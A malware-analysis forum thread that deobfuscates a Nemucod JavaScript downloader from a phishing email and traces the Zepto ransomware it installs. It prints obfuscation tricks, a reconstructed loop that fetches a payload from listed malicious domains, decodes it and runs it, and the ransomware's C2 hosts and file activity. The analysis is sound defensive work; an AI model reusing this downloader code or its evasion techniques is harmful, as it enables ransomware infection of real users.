Malware Analysis New fresh sample received by mail - JS/TrojanDownloader.Nemucod.AJP

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Latest version received by e-mail attachment: July, 12 2016

https://www.virustotal.com/en/file/...83cc067b95e7b23f5cd9a32f895c4acc1f2/analysis/

-SWIFT-dbc-.js
Detection ratio: 25 / 55


"hi DardiM,

Here's that excel file (latest invoices) that you wanted.

Best regards,
Elnora Lowery
Chief Executive Officer"


Threat Verdict: malicious
Threat Score: 100/100
AV Detection Ratio: 36%
AV Family Name: JS:Trojan.JS.Downloader , Trojan-Downloader.JS.Agent.lph, JS/TrojanDownloader.Nemucod.AJP
Time of analysis: 2016-07-14 01:53:48
File Size (bytes): 82904
File Type: ASCII text, with CRLF, LF line terminators Contacted Domains: zachphoto.7u.cz, error.banan.cz, nicesound.biz, acepipesdeli.com.br Contacted Hosts: 77.93.211.244, 186.202.153.125


function f(s) {return eval(s);};

var abvxN2A = [';}\n','\xff',
'\r;)','\xff',
'(])','\xff',
'cTH','\xff',
'RM(','\xff',
'8yX','\xff',
'ZG ','\xff',
...
...
...
'\r;"','\xff',
'" +','\xff',
' "e','\xff',
'sol','\xff',
'c" ','\xff',
'= 8','\xff',
'eVK','\xff',
'WB ','\xff',
'rav'];
=> NOT TOO DIFFICULT TO READ FROM THE END (reversed) : var BWKVe8 = "close";...
/*@cc_on
b = abvxN2A;
b = b["join"]("");
b = b["split"]("\xff");
b = b["join"]("");
b = b["split"]("");
c = b["reverse"]();

c = c["join"]("");
@*/

if (c["length"] >= 12) f(c);

In this method for "all in a var", it differs from other versions by using a function to indirectly eval the content of c var, and by operations done before calling it :
b = abvxN2A;
b = b["join"]("");
b = b["split"]("\xff");
b = b["join"]("");
b = b["split"]("");
c = b["reverse"]();

c = c["join"]("");

An example of what can be seen after above operations, without evaluation :
Real string are cut in several parts
var BWKVe8 = "close";
var NRZu = "le";
var Kk0 = "eToFi";
var KOIv = "Sav";
var HWl = "xt";
var Rm2 = "teTe";
var OEy0 = "wri";
var KVq = "open"
var OISc = "arset";
var Qp = "Ch";
var CYb7 = "type"
var ARRr = "eam";
var Us3 = "B.Str"
var Mb = "ADOD";
var BFp = "ect"
var DYg = "bj";
var Es0 = "eO";
var EIq = "Creat";
var JFRGy = "in";
var Qx9 = "jo";
var OMXj = "e";
var PWq = "rCod";
var Kg = "Cha";
var UPNl7 = "from";
var NGn = "h";
var UUr = "lengt";
function IKu8(FRXf7){return FRXf7;};
function KWCc(FNs){return FNs;};
var OUp9 = "sh";
var Sv9 = "pu";
function Gs1(IQj9){return IQj9;};

...
=> real vars content are constructed after :
- example : KOIv + Kk0 + KOIv => "SaveFileTo"

It uses Bitwise and Bit Shift Operators :

Bitwise inclusive OR operation and Shift Operators
var NJx3=HMNz[HMNz[MSd0(BVh8) + OTFi1(DPf8)]-4] | HMNz[HMNz[BVh8 + DPf8]-3] << 8 | HMNz[HMNz[BVh8 + DPf8]-2] << 16 | HMNz[HMNz[BVh8 + DPf8]-1] ;


for (var Pg3=0; Pg3 < HMNz[BVh8 + (function DYn5(){return DPf8;}())]; Pg3++) {
HMNz[Pg3]
^= SRCAj8; => bitwise exclusive OR operation (XOR)
SRCAj8=(SRCAj8 + Vt) % 256; }; => modulo
return HMNz; };

Some Script / method / object used :

"WScript.Shell"
"ADOB.Stream"

"WinHttp.WinHttpRequest.5.1"
"MSXML2.XMLHTTP"

=> two connection methods available, to be sure :p

"Sleep"
"CreateObject"
"LoadFromFile"
"saveToFile"
"writeText
"open"
"write"
...


HTTP request by GET Method :

=> several URLs => to increase its chances of success

zachphoto.7u.cz/0jyhh
nicesound.biz/42did
acepipesdeli.com.br/tffx7


=> Names constructed by concatenation of several "clear" vars

Path of file that is downloaded :

CreateObject(WScript.Shell).ExpandEnvironmentStrings(%TEMP%/)
=> "C:\Users\DardiM\AppData\Local\Temp\
+ concatenation
=> "C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM.exe"

This sample is not a well formed executable format , to avoid a possible detection by protection tools : it is an obfuscated file.

If no sample can be downloaded :
"C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM"
=> a XML file (without extension) which is regularly modified (modified time)
=> If you delete it manually, created again :)
=> that's why it's seen as XML file on some dynamical analysis (www.hybrid-analysis.com)
"%TEMP%\uosoT7UCkbfcrM
Size 1008B (1008 bytes)
Type XML document text
Runtime Processwscript.exe (PID: 2468)"

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="XHTML namespace" lang="en" xml:lang="en">
<head>
<title>Object not found!</title>
<link rev="made" href="mailto:root@localhost" />
<style type="text/css"><!--/*--><![CDATA[/*><!--*/
body { color: #000000; background-color: #FFFFFF; }
a:link { color: #0000CC; }
p, address {margin-left: 3em;}
span {font-size: smaller;}
/*]]>*/--></style>
</head>

<body>
<h1>Object not found!!</h1>
<p>


The requested URL was not found on this server.

If you entered the URL manually please check your
spelling and try again.

</p>
<p>
If you think this is a server error, please contact
<a href="mailto:root@localhost">webmestre</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">acepipesdeli.com.br</a><br />
<span>Thu Jul 14 20:03:30 2016<br />
Apache</span>
</address>
</body>
</html>

Several Arrays of chars :
=> character substitution cipher (see explanation a the end)
2 arrays for substitution function found :
=> All characters in the file are converted to their decimal values. If a character’s decimal value is higher than 127, the character is replaced with its corresponding value from a pre-defined array of characters. If not, the character remains untouched
One example :
function NDn2(BCs1) {
var FCi9=new Array(); FCi9[0xC7]=0x80; FCi9[0xFC]=0x81; FCi9[0xE9]=0x82; FCi9[0xE2]=0x83; FCi9[0xE4]=0x84; FCi9[0xE0]=0x85; FCi9[0xE5]=0x86; FCi9[0xE7]=0x87; FCi9[0xEA]=0x88; FCi9[0xEB]=0x89; FCi9[0xE8]=0x8A; FCi9[0xEF]=0x8B; FCi9[0xEE]=0x8C; FCi9[0xEC]=0x8D; FCi9[0xC4]=0x8E; FCi9[0xC5]=0x8F; FCi9[0xC9]=0x90; FCi9[0xE6]=0x91; FCi9[0xC6]=0x92; FCi9[0xF4]=0x93; FCi9[0xF6]=0x94; FCi9[0xF2]=0x95; FCi9[0xFB]=0x96; FCi9[0xF9]=0x97; FCi9[0xFF]=0x98; FCi9[0xD6]=0x99; FCi9[0xDC]=0x9A; FCi9[0xA2]=0x9B; FCi9[0xA3]=0x9C; FCi9[0xA5]=0x9D; FCi9[0x20A7]=0x9E; FCi9[0x192]=0x9F; FCi9[0xE1]=0xA0; FCi9[0xED]=0xA1; FCi9[0xF3]=0xA2; FCi9[0xFA]=0xA3; FCi9[0xF1]=0xA4; FCi9[0xD1]=0xA5; FCi9[0xAA]=0xA6; FCi9[0xBA]=0xA7; FCi9[0xBF]=0xA8; FCi9[0x2310]=0xA9; FCi9[0xAC]=0xAA; FCi9[0xBD]=0xAB; FCi9[0xBC]=0xAC; FCi9[0xA1]=0xAD; FCi9[0xAB]=0xAE; FCi9[0xBB]=0xAF; FCi9[0x2591]=0xB0; FCi9[0x2592]=0xB1; FCi9[0x2593]=0xB2; FCi9[0x2502]=0xB3; FCi9[0x2524]=0xB4; FCi9[0x2561]=0xB5; FCi9[0x2562]=0xB6; FCi9[0x2556]=0xB7; FCi9[0x2555]=0xB8; FCi9[0x2563]=0xB9; FCi9[0x2551]=0xBA; FCi9[0x2557]=0xBB; FCi9[0x255D]=0xBC; FCi9[0x255C]=0xBD; FCi9[0x255B]=0xBE; FCi9[0x2510]=0xBF; FCi9[0x2514]=0xC0; FCi9[0x2534]=0xC1; FCi9[0x252C]=0xC2; FCi9[0x251C]=0xC3; FCi9[0x2500]=0xC4; FCi9[0x253C]=0xC5; FCi9[0x255E]=0xC6; FCi9[0x255F]=0xC7; FCi9[0x255A]=0xC8; FCi9[0x2554]=0xC9; FCi9[0x2569]=0xCA; FCi9[0x2566]=0xCB; FCi9[0x2560]=0xCC; FCi9[0x2550]=0xCD; FCi9[0x256C]=0xCE; FCi9[0x2567]=0xCF; FCi9[0x2568]=0xD0; FCi9[0x2564]=0xD1; FCi9[0x2565]=0xD2; FCi9[0x2559]=0xD3; FCi9[0x2558]=0xD4; FCi9[0x2552]=0xD5; FCi9[0x2553]=0xD6; FCi9[0x256B]=0xD7; FCi9[0x256A]=0xD8; FCi9[0x2518]=0xD9; FCi9[0x250C]=0xDA; FCi9[0x2588]=0xDB; FCi9[0x2584]=0xDC; FCi9[0x258C]=0xDD; FCi9[0x2590]=0xDE; FCi9[0x2580]=0xDF; FCi9[0x3B1]=0xE0; FCi9[0xDF]=0xE1; FCi9[0x393]=0xE2; FCi9[0x3C0]=0xE3; FCi9[0x3A3]=0xE4; FCi9[0x3C3]=0xE5; FCi9[0xB5]=0xE6; FCi9[0x3C4]=0xE7; FCi9[0x3A6]=0xE8; FCi9[0x398]=0xE9; FCi9[0x3A9]=0xEA; FCi9[0x3B4]=0xEB; FCi9[0x221E]=0xEC; FCi9[0x3C6]=0xED; FCi9[0x3B5]=0xEE; FCi9[0x2229]=0xEF; FCi9[0x2261]=0xF0; FCi9[0xB1]=0xF1; FCi9[0x2265]=0xF2; FCi9[0x2264]=0xF3; FCi9[0x2320]=0xF4; FCi9[0x2321]=0xF5; FCi9[0xF7]=0xF6; FCi9[0x2248]=0xF7; FCi9[0xB0]=0xF8; FCi9[0x2219]=0xF9; FCi9[0xB7]=0xFA; FCi9[0x221A]=0xFB; FCi9[0x207F]=0xFC; FCi9[0xB2]=0xFD; FCi9[0x25A0]=0xFE; FCi9[0xA0]=0xFF;
};var KUXf=new Array();
for (var Pg3=0; Pg3 < BCs1[BVh8 + DPf8]; Pg3++) {
var LEAc=BCs1[Su + OOGv0 + Gs1(RHJi) + (function Od(){return AHo7;}())](Pg3);
if (LEAc < (614 - 486)) {
var VCRBj=LEAc;}
else {
var VCRBj=FCi9[LEAc];
}
KUXf[IKu8(Sv9) + KWCc(OUp9)](VCRBj); };
return KUXf;

Conclusion :

The Javascript is interacting with the downloaded sample and doing a few additional layers of dis-obfuscation :

- character substitution cipher

- character removal, XORing, and reversing the file

Then, it validates the magic numbers in the file header : 4D5a ((MZ", Windows PE) :

function Xu9(HMNz) {
if (HMNz[1 * 0]== 0x4D && HMNz[1]== 0x5a) {return true;}
else {return false;}
};


The exe is run with a parameter !
=> "321"
=> "C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM.exe 321"


Will see if I post more :)
(still few things to say about how this Js file works, but don't think it's important, currently)
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Good, Nemucod usually drops Ransomware and it's only used as a downloader. If you have the payload, do a quick analysis and post it here :D
There have already been other versions with similar behavior, but few differences before and after the var "obfuscated".
http://malwaretips.com/threads/new-nemucod-wave-began.60829/#post-519129
I never made an analysis for these versions before (the obfuscated part), so today I began this small analysis.

I haven't got yet the payload (the file downloaded is not the real final file, because it needs to be modified by the js downloader).
=> I've not run the JS file when I've done my dis-obfuscation / analysis (safe mode analyzing).
But it may not be a big challenge to modify the js file to let it downloading and modifying the file, without running it a the end of the process.

I will try to obtain a working version (must first find a working url).
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
First post updated (added the case the sample can't be downloaded, and some others info)

Working version analysis here :
https://www.hybrid-analysis.com/sam...34de531f979c5722266e3ddf938?environmentId=100

Different file name seen on some analysis but same size (139776 bytes), same domains, same host (the first in the list from my first post)

GET /0jyhh HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: zachphoto.7u.cz Connection: Keep-Alive

=>
/0jyhh
/tffx7
are both I've seen on my sample js
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
I will certainly join a PDF file to show what it's look like when dis-obfuscated (or deobfuscated :rolleyes:).

A small part now.

The Loop do .... while explain why the uosoT7UCkbfcrM has its modification time regularly modified (XML content is the response of HTTP request if the sample is not found)
=> the process doesn't end, waiting for the good obfuscated sample to be downloaded.
It will only become uosoT7UCkbfcrM.exe as soon as all got well, and then run the malware with the good parameter.

var httpMethod=["WinHttp.WinHttpRequest.(5.1)", "MSXML2.XMLHTTP"];

for (var index=0; index < httpMethod.length; index++)
{

try {
var objet_Http=WScript.CreateObject(httpMethod[index]); // "WinHttp.WinHttpRequest.(5.1)", "MSXML2.XMLHTTP"
break;
}
catch (e)
{

continue; // next index
}
};

var WAk8=1;
var Ba=0;
do {

try {
if (1== WAk8)
{

if (Ba >= URLS_array.length) // array with 3 urls
{
Ba=0;
WScript.
Sleep(1000);
}
objet_Http.
open("GET", URLS_array[Ba++ % URLS_array.length], false);
objet_Http.
send();
}
if (objet_Http.
readystate < 4)
{

WScript.Sleep(1000);
continue;
}
var object_ADODB_Stream=WScript.
CreateObject("ADODB.Stream");
object_ADODB_Stream.
open();
object_ADODB_Stream.
type=1; //Binary data
object_ADODB_Stream.write(objet_Http.ResponseBody);
object_ADODB_Stream.
position=0;
object_ADODB_Stream.
SaveToFile(uosoT7UCkbfcrM_file_path, 2);
object_ADODB_Stream.
close();

var file_content=ReadTextFromFile_char_substitution_1(uosoT7UCkbfcrM_file_path);
// "C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM"

file_content=deobfuscation(file_content);
// Bitwise inclusive OR operation and Shift Operators
// bitwise exclusive OR operation (XOR) modulo
// and more :p

if (file_content.length < 100 * 1024 || file_content.length > 230 * 1024 || !has_MZ(file_content))
{

WAk8=1; continue; // not the valid exe file => jump to while (WAk8)
}
try {

WriteTextToFile_char_substitution_2(uosoT7UCkbfcrM_EXE_file_path, file_content); // try to create the valid exe, with Charset windows-437
}
catch (e) {

break;
};
object_Shell.
Run(uosoT7UCkbfcrM_EXE_file_path + " 321");
// run the valid exe (ransomware) file with parameter "321"
// "C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM.exe 321"
break;
}
catch (e) {

WScript.Sleep(1000);
continue;
=> jump to while (WAk8)
};
} while (WAk8);
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
The URLs in my sample doesn't work anymore.
With small modifications on the deobfuscated JS downloader (I deleted the 'download and run' parts), and with an other obfuscated payload renamed (from the same wave) put in a folder, I successfully made it become a valid exe with good content inside.

I can now make a dynamical analysis of the ransomware payload.

=> clouf.exe 1.5.2.2

.zepto extension at the end of each encrypted file
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Ransomware name when tested : uosoT7UCkbfcrM.exe (real name : clouf)

My Log file for analisys is more than 250 MB :


- Interesting Reg Keys and files opened / created (I can't list all :confused:)

C:\Windows\SysWOW64\winmmbase.dll
C:\Windows\SysWOW64\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64log.dll
C:\Windows\SysWOW64\kernel32.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\SysWOW64\KernelBase.dll
C:\Windows\SysWOW64\gdi32.dll

C:\Windows\SysWOW64\cryptbase.dll
C:\Windows\SysWOW64\bcryptprimitives.dll


C:\Windows\SysWOW64\windows.storage.dll
C:\Windows\SysWOW64\combase.dll
C:\Windows\SysWOW64\shlwapi.dll
C:\Windows\SysWOW64\kernel.appcore.dll

C:\Windows\SysWOW64\winmmbase.dll
C:\Windows\SysWOW64\imm32.dll

C:\Windows\SysWOW64\uxtheme.dll

C:\Windows\SysWOW64\wininet.dll
C:\Windows\SysWOW64\mpr.dll
C:\Windows\SysWOW64\dsrole.dll

C:\Windows\SysWOW64\urlmon.dll
C:\Windows\SysWOW64\iertutil.dll

C:\Windows\SysWOW64\cryptsp.dll

HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider


C:\Windows\SysWOW64\rsaenh.dll
C:\Windows\SysWOW64\bcrypt.dll


HKLM\SOFTWARE\Policies\Microsoft\Cryptography\PrivKeyCacheMaxItems
HKLM\SOFTWARE\Policies\Microsoft\Cryptography\PrivKeyCachePurgeIntervalSeconds
HKLM\SOFTWARE\Policies\Microsoft\Cryptography\PrivateKeyLifetimeSeconds

HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid

HKLM\System\CurrentControlSet\Control\Cryptography\Providers
HKLM\System\CurrentControlSet\Control\Cryptography\Configuration

C:\Windows\SysWOW64\ntmarta.dll

HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider\Image Path

HKLM\Software\WOW6432Node\Microsoft\Cryptography\DESHashSessionKeyBackward

HKLM\Software\WOW6432Node\Microsoft\Rpc
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName

HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION

HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\
uosoT7UCkbfcrM.exe
=> NOT FOUND

HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\uosoT7UCkbfcrM.exe
=> NOT FOUND

HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKLM\Software\WOW6432Node\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform

C:\Windows\SysWOW64\phoneinfo.dll
=> NOT FOUND

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5

HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1

HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Cache
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData


C:\Users\DardiM\AppData\Local\Microsoft\Windows\INetCache
C:\Users\DardiM\AppData\Local\Microsoft\Windows\INetCache\counters.dat
C:\Windows\SysWOW64\KernelBase.dll

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate


HKLM\System\CurrentControlSet\Services\WinSock2\Parameters
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9

C:\Windows\SysWOW64\OnDemandConnRouteHelper.dll
C:\Windows\SysWOW64\IPHLPAPI.DLL
C:\Windows\SysWOW64\winhttp.dll

HKLM\System\CurrentControlSet\Control\SESSION MANAGER

C:\Windows\SysWOW64\mswsock.dll

HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\Psched\WinSock 2.0 Provider ID
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock\Mapping

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders


C:\Users\DardiM\AppData\Local\Microsoft\Windows\History\History.IE5
C:\Windows\SysWOW64\dnsapi.dll
C:\Windows\SysWOW64\mswsock.dll
C:\Windows\SysWOW64\fr-FR\mswsock.dll.mui
C:\Windows\SysWOW64\mswsock.dll
C:\Windows\SysWOW64\fr-FR\wshqos.dll.mui
C:\Windows\SysWOW64\wshqos.dll

URLS
v43762.hosted-by-vdsina.ru
388.BE.1.multiservers.xyz
5.196.189.37

77.222.54.202 (City Pargolovo - State/Region Sankt-Peterburg - Country Code RU)
=> TCP Connect
=> TCP Send
=> TCP TCPCopy
=> TCP Receive


Others files :
C:\Windows\SysWOW64\fr-FR\mpr.dll.mui
C:\Windows\SysWOW64\drprov.dll
C:\Windows\SysWOW64\winsta.dll
C:\Windows\SysWOW64\ntlanman.dll
C:\Windows\SysWOW64\davclnt.dll
C:\Windows\SysWOW64\davhlpr.dll
C:\Windows\SysWOW64\wkscli.dll
C:\Windows\SysWOW64\cscapi.dll
C:\Windows\SysWOW64\netutils.dll
C:\Windows\SysWOW64\browcli.dll

HKLM\System\CurrentControlSet\Control\SQMServiceList\SQMServiceList

C:\Windows\CSC\v2.0.6\namespace
C:\Windows\SysWOW64\srvcli.dll
C:\Windows\CSC\v2.0.6\namespace\DARDIM-PC

Then it retries all Drive letters

HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider
HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider\Image Path

=> loop to encrypt initialized !

C:\120 Wallpapers HD

HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe


AT THE END :

Some IRP_MJ_CLEANUP & IRP_MJ_CLOSE

C:\Windows\AppPatch\apppatch64\sysmain.sdb
C:\Windows\SysWOW64\cmd.exe
C:\Windows\Fonts\StaticCache.dat
C:\Users\DardiM\AppData\Local\Temp
C:\Users\DardiM\AppData\Local\Microsoft\Windows\INetCache\counters.dat
C:\Windows\SysWOW64\fr-FR\mpr.dll.mui
C:\Windows\SysWOW64\fr-FR\mswsock.dll.mui
C:\Windows\SysWOW64\fr-FR\propsys.dll.mui

TCP Disconnect 77.222.54.202 (City Pargolovo - State/Region Sankt-Peterburg - Country Code RU)

Files created
C:\Users\DardiM\Desktop\_HELP_instructions.html
C:\Windows\Fonts\StaticCache.dat
C:\Users\DardiM\Desktop\_HELP_instructions.bmp

Files Read
C:\Windows\SysWOW64\propsys.dll
C:\Windows\SysWOW64\clbcatq.dll
C:\Windows\Registration\R000000000015.clb
C:\Users\DardiM\Desktop\desktop.ini
C:\desktop.ini
C:\Users\desktop.ini
C:\Windows\SysWOW64\windows.storage.dll
C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.494_none_ea85e725b9ba5a4b\comctl32.dll
C:\Windows\WindowsShell.Manifest
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

%temp%\uosoT7UCkbfcrM.exe closed

=> An HTML file is located in each Folder where files have been encrypted
Example :
_2_HELP_instructions.html
C:\120 Wallpapers HD\5FC4B320-69D3-B282-97E0-DE77CFB27811.zepto

At the end, a html file is opened with information about what happened, and instructions to pay the ransom
There is only one _HELP_instructions.bmp file for all _instructions.html created

screen.jpg


Note :
I will not write more about this ransomware family (all the samples I've seen work the same way) :)
Will wait for next wave, if something new :rolleyes:
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
S/TrojanDownloader.Nemucod.AJP :

desobfuscated file joined.
=> some typing and naming errors (functions) corrected.

FOR INFORMATION PURPOSES ONLY
 

Attachments

  • deobfuscated.pdf
    172.7 KB · Views: 382
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top